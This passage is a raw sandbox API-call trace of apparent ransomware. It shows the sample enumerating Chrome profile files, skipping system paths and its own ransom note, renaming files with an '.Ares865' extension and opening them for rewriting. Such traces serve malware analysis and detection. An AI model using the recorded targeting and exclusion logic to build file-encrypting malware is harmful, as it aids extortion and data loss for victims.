param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.Ares865") returned 102 [0099.736] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing channel ids"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing channel ids.ares865"), dwFlags=0x1) returned 1 [0099.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing channel ids.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5120) returned 1 [0099.744] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.Ares865") returned 110 [0099.744] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing channel ids-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing channel ids-journal.ares865"), dwFlags=0x1) returned 1 [0099.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing channel ids-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.745] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.745] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.745] CloseHandle (hObject=0x0) returned 0 [0099.745] CloseHandle (hObject=0x118) returned 1 [0099.745] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Safe Browsing Cookies", cAlternateFileName="SAFEBR~1")) returned 1 [0099.745] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.745] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="aoldtz.exe") returned 1 [0099.745] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2=".") returned 1 [0099.745] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="..") returned 1 [0099.745] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="windows") returned -1 [0099.745] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="bootmgr") returned 1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="temp") returned -1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="pagefile.sys") returned 1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="boot") returned 1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="ids.txt") returned 1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="ntuser.dat") returned 1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="perflogs") returned 1 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="MSBuild") returned 1 [0099.746] lstrlenW (lpString="Safe Browsing Cookies") returned 21 [0099.746] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 102 [0099.746] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Safe Browsing Cookies" | out: lpString1="Safe Browsing Cookies") returned="Safe Browsing Cookies" [0099.746] lstrlenW (lpString="Safe Browsing Cookies") returned 21 [0099.746] lstrlenW (lpString="Ares865") returned 7 [0099.746] lstrcmpiW (lpString1="Cookies", lpString2="Ares865") returned 1 [0099.746] lstrlenW (lpString=".dll") returned 4 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2=".dll") returned 1 [0099.746] lstrlenW (lpString=".lnk") returned 4 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2=".lnk") returned 1 [0099.746] lstrlenW (lpString=".ini") returned 4 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2=".ini") returned 1 [0099.746] lstrlenW (lpString=".sys") returned 4 [0099.746] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2=".sys") returned 1 [0099.746] lstrlenW (lpString="Safe Browsing Cookies") returned 21 [0099.746] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies.Ares865") returned 98 [0099.746] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing cookies"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing cookies.ares865"), dwFlags=0x1) returned 1 [0099.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing cookies.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.748] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0099.751] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.Ares865") returned 106 [0099.751] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing cookies-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing cookies-journal.ares865"), dwFlags=0x1) returned 1 [0099.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\safe browsing cookies-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.752] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.752] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.752] CloseHandle (hObject=0x0) returned 0 [0099.752] CloseHandle (hObject=0x118) returned 1 [0099.753] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSLErrorAssistant", cAlternateFileName="SSLERR~1")) returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="aoldtz.exe") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="windows") returned -1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="bootmgr") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="temp") returned -1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="pagefile.sys") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="boot") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="ids.txt") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="ntuser.dat") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="perflogs") returned 1 [0099.753] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="MSBuild") returned 1 [0099.753] lstrlenW (lpString="SSLErrorAssistant") returned 17 [0099.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 98 [0099.753] lstrcpyW (in: lpString1=0x2cce48a, lpString2="SSLErrorAssistant" | out: lpString1="SSLErrorAssistant") returned="SSLErrorAssistant" [0099.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0099.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xae) returned 0x2c8eb8 [0099.753] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0099.753] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SwReporter", cAlternateFileName="SWREPO~1")) returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="aoldtz.exe") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2=".") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="..") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="windows") returned -1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="bootmgr") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="temp") returned -1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="pagefile.sys") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="boot") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="ids.txt") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="ntuser.dat") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="perflogs") returned 1 [0099.753] lstrcmpiW (lpString1="SwReporter", lpString2="MSBuild") returned 1 [0099.753] lstrlenW (lpString="SwReporter") returned 10 [0099.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 86 [0099.754] lstrcpyW (in: lpString1=0x2cce48a, lpString2="SwReporter" | out: lpString1="SwReporter") returned="SwReporter" [0099.754] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0099.754] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x2d7850 [0099.754] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0099.754] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dddd500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dddd500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="aoldtz.exe") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2=".") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="..") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="windows") returned -1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="bootmgr") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="temp") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="pagefile.sys") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="boot") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="ids.txt") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="ntuser.dat") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="perflogs") returned 1 [0099.754] lstrcmpiW (lpString1="WidevineCdm", lpString2="MSBuild") returned 1 [0099.754] lstrlenW (lpString="WidevineCdm") returned 11 [0099.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SwReporter") returned 79 [0099.754] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WidevineCdm" | out: lpString1="WidevineCdm") returned="WidevineCdm" [0099.754] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0099.754] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2e2920 [0099.754] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0099.754] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dddd500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dddd500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 0 [0099.754] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.754] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0099.754] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\WidevineCdm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\WidevineCdm" [0099.755] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SwReporter", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SwReporter" [0099.756] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SSLErrorAssistant", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0099.756] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\pnacl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\pnacl" [0099.757] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\PepperFlash", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\PepperFlash" [0099.757] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\OriginTrials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\OriginTrials" [0099.758] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\FileTypePolicies", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\FileTypePolicies" [0099.758] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\EVWhitelist", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\EVWhitelist" [0099.758] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default" [0099.759] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies.Ares865") returned 92 [0099.759] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cookies"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cookies.ares865"), dwFlags=0x1) returned 1 [0099.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cookies.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.761] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0099.764] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies-journal.Ares865") returned 100 [0099.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cookies-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cookies-journal.ares865"), dwFlags=0x1) returned 1 [0099.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cookies-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.766] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.766] CloseHandle (hObject=0x0) returned 0 [0099.766] CloseHandle (hObject=0x118) returned 1 [0099.766] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83b08a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x83b08a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0b57b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Current Session", cAlternateFileName="CURREN~1")) returned 1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="aoldtz.exe") returned 1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2=".") returned 1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="..") returned 1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="windows") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="bootmgr") returned 1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="temp") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="pagefile.sys") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="boot") returned 1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="ids.txt") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="ntuser.dat") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="perflogs") returned -1 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2="MSBuild") returned -1 [0099.766] lstrlenW (lpString="Current Session") returned 15 [0099.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 92 [0099.766] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Current Session" | out: lpString1="Current Session") returned="Current Session" [0099.766] lstrlenW (lpString="Current Session") returned 15 [0099.766] lstrlenW (lpString="Ares865") returned 7 [0099.766] lstrcmpiW (lpString1="Session", lpString2="Ares865") returned 1 [0099.766] lstrlenW (lpString=".dll") returned 4 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2=".dll") returned 1 [0099.766] lstrlenW (lpString=".lnk") returned 4 [0099.766] lstrcmpiW (lpString1="Current Session", lpString2=".lnk") returned 1 [0099.767] lstrlenW (lpString=".ini") returned 4 [0099.767] lstrcmpiW (lpString1="Current Session", lpString2=".ini") returned 1 [0099.767] lstrlenW (lpString=".sys") returned 4 [0099.767] lstrcmpiW (lpString1="Current Session", lpString2=".sys") returned 1 [0099.767] lstrlenW (lpString="Current Session") returned 15 [0099.767] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Current Session.Ares865") returned 100 [0099.767] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\current session"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Current Session.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\current session.ares865"), dwFlags=0x1) returned 1 [0099.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Current Session.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\current session.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.769] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=470) returned 1 [0099.772] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons.Ares865") returned 93 [0099.772] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\favicons"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 